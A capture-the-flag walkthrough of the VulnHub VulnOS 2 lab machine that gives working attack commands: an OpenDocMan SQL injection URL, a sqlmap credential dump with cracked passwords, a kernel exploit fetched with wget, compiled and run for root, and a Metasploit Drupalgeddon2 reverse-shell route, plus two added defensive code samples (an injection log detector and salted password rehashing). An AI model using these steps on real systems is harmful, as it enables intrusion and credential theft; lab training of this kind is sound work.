Machine Link : https://www.vulnhub.com/entry/vulnos-2,147/
STEP1
arp-scan -l -- to get the victim ip
FINDING
192.168.0.102
-------------------------------------------------------------------------------------------------------------
STEP2
nmap -T4 -sSV -p- 192.168.0.102 -Pn -A
FINDING
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
6667/tcp open irc ngircd
OS details: Linux 3.2 - 4.9
-------------------------------------------------------------------------------------------------------------
STEP3
Open the site in a browser using the IP and click the red "website" link at the bottom
-------------------------------------------------------------------------------------------------------------
STEP4
feroxbuster -u http://192.168.0.104/jabc/
FINDING
192.168.0.104/jabc/modules/blog/blog.info
version = "7.26"
project = "drupal"
http://192.168.0.104/jabc/modules/node/node.test (XSS popup)
-------------------------------------------------------------------------------------------------------------
STEP5
click on the Document tab and view the page source
FINDING
/jabcd0cs/ at line 142
-------------------------------------------------------------------------------------------------------------
STEP6
dirb http://192.168.0.104/jabcd0cs/
http://192.168.0.104/jabcd0cs/ -- it is a login page
NOTE -- at the bottom of the page
search exploit for "OpenDocMan v1.2.7"
FINDING
https://www.exploit-db.com/exploits/32075
http://[host]/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9 -- SQL injection vulnerability found in the exploit
sqlmap -u "http://192.168.0.104/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --batch --dbms=mysql --dbs -p add_value --dump
FINDING
+----+--------------------+-------------+------------------------------------------+----------+-----------+------------+------------+---------------+
| id | Email | phone | password | username | last_name | department | first_name | pw_reset_code |
+----+--------------------+-------------+------------------------------------------+----------+-----------+------------+------------+---------------+
| 1 | [email protected] | 5555551212 | b78aae356709f8c31118ea613980954b | webmin | min | 2 | web | blank |
| 2 | [email protected] | 555 5555555 | 084e0343a0486ff05530df6c705c8bb4 (guest) | guest | guest | 2 | guest | NULL |
| 3 | [email protected] | 9999999999 | b438079e6d6db31c2aad9fdf1032e756 | C | A | 1 | B | NULL |
| 4 | [email protected] | 9999999999 | 3b253eadc522d0a2294eb492aba9b28c | U | L | 2 | F | NULL |
| 5 | [email protected] | 123 4567890 | 64cc3db263af674b6b01fae1fc30bc7b | USERNAME | LAST | 2 | FIRST | NULL |
+----+--------------------+-------------+------------------------------------------+----------+-----------+------------+------------+---------------+
webmin - webmin1980 (password)
guest - guest (password)
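Added example (not part of the original walkthrough or of OpenDocMan): a defender-side check for the add_value injection above, used both as an allow-list validator and as an access-log detector. It assumes a legitimate add_value is a bare table name such as odm_user and that the server writes Apache common-format access logs; the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache access-log lines (not taken from the target machine).
SAMPLE_LOG = """\
192.168.0.50 - - [01/Jan/2024:10:00:01 +0000] "GET /jabcd0cs/ajax_udf.php?q=1&add_value=odm_user HTTP/1.1" 200 512
192.168.0.50 - - [01/Jan/2024:10:00:07 +0000] "GET /jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9 HTTP/1.1" 200 734
192.168.0.50 - - [01/Jan/2024:10:00:09 +0000] "GET /jabcd0cs/index.php HTTP/1.1" 200 2048
"""

REQUEST = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')
IDENTIFIER = re.compile(r"[A-Za-z0-9_]{1,64}")  # assumed shape of a table name


def is_safe_add_value(value):
    """Allow-list check: add_value must be a bare SQL identifier."""
    return IDENTIFIER.fullmatch(value) is not None


def find_suspicious(log_text, script="ajax_udf.php"):
    """Return (client, timestamp, decoded add_value) for requests failing the check."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        client, ts, _method, target, _status = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/" + script):
            continue
        # parse_qs percent-decodes, so %20UNION%20SELECT is compared as plain text
        for value in parse_qs(url.query, keep_blank_values=True).get("add_value", []):
            if not is_safe_add_value(value):
                hits.append((client, ts, value))
    return hits


if __name__ == "__main__":
    for client, ts, value in find_suspicious(SAMPLE_LOG):
        print(f"{ts} {client} add_value={value!r}")
```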
-------------------------------------------------------------------------------------------------------------
STEP6
ssh [email protected] -p 22 -- with password webmin1980
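Added example (not part of the original walkthrough or of OpenDocMan): the 32-hex-character password values in the dump are unsalted MD5, which is how the webmin password used for this SSH login was recovered. The sketch below verifies such legacy values and replaces them with a salted PBKDF2 record at the next successful login; the record format, function names and work factor are assumptions.

```python
import hashlib
import hmac
import os

PBKDF2_ROUNDS = 600_000  # assumed work factor; tune for your hardware


def hash_password(password, salt=None):
    """Return 'pbkdf2$rounds$salt_hex$digest_hex' with a fresh random salt."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return f"pbkdf2${PBKDF2_ROUNDS}${salt.hex()}${digest.hex()}"


def verify(password, stored):
    """Check a password against a legacy bare-MD5 value or a pbkdf2 record."""
    if stored.startswith("pbkdf2$"):
        _, rounds, salt_hex, digest_hex = stored.split("$")
        digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                     bytes.fromhex(salt_hex), int(rounds))
        return hmac.compare_digest(digest.hex(), digest_hex)
    legacy = hashlib.md5(password.encode()).hexdigest()
    return hmac.compare_digest(legacy, stored.lower())


def login(users, username, password):
    """Verify, and on success replace a legacy MD5 value with a salted record."""
    stored = users.get(username)
    if stored is None or not verify(password, stored):
        return False
    if not stored.startswith("pbkdf2$"):
        users[username] = hash_password(password)  # upgrade in place
    return True


def legacy_accounts(users):
    """Accounts still stored as bare MD5 (candidates for a forced reset)."""
    return sorted(u for u, h in users.items() if not h.startswith("pbkdf2$"))


# Constructed user table holding two password values shown in the dump above.
USERS = {"guest": "084e0343a0486ff05530df6c705c8bb4",
         "webmin": "b78aae356709f8c31118ea613980954b"}
```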
-------------------------------------------------------------------------------------------------------------
STEP7
python -c 'import pty; pty.spawn("/bin/bash")'
-------------------------------------------------------------------------------------------------------------
STEP8
uname -r
FINDING
3.13.0-24-generic
-------------------------------------------------------------------------------------------------------------
STEP9
search kernel exploit 3.13.0-24-generic
FINDING
https://www.exploit-db.com/exploits/37292
-------------------------------------------------------------------------------------------------------------
STEP10
on terminal
cd /tmp
wget https://www.exploit-db.com/download/37292
ls
webmin@VulnOSv2:/tmp$ cp 37292 37292.c
webmin@VulnOSv2:/tmp$ gcc 37292.c -o exploitt.c -pthread
webmin@VulnOSv2:/tmp$ ./exploitt.c
whoami
you will be root
# cd /root
# ls
flag.txt
cat flag.txt
Hello and welcome.
You successfully compromised the company "JABC" and the server completely !!
Congratulations !!!
Hope you enjoyed it.
What do you think of A.I.?
=============WITH MSFCONSOLE===============================
STEP5
service postgresql start && msfconsole -- open msfconsole
msf6 > search exploit drupal
msf6 > use 1
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/drupal_drupalgeddon2) >
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.168.0.104
rhosts => 192.168.0.104
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set targeturi /jabc/
targeturi => /jabc/
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > run
-------------------------------------------------------------------------------------------------------------
STEP6
meterpreter shell
-------------------------------------------------------------------------------------------------------------
STEP7
python -c 'import pty; pty.spawn("/bin/bash")'
-------------------------------------------------------------------------------------------------------------
STEP8
uname -r
FINDING
3.13.0-24-generic
-------------------------------------------------------------------------------------------------------------
STEP9
search kernel exploit 3.13.0-24-generic
FINDING
https://www.exploit-db.com/exploits/37292
-------------------------------------------------------------------------------------------------------------
STEP10
on terminal
cd /tmp
wget https://www.exploit-db.com/download/37292
ls
webmin@VulnOSv2:/tmp$ cp 37292 37292.c
webmin@VulnOSv2:/tmp$ gcc 37292.c -o exploitt.c -pthread
webmin@VulnOSv2:/tmp$ ./exploitt.c
whoami
you will be root
# cd /root
# ls
flag.txt
cat flag.txt
Hello and welcome.
You successfully compromised the company "JABC" and the server completely !!
Congratulations !!!
Hope you enjoyed it.
What do you think of A.I.?
-------------------------------------------------------------------------------------------------------------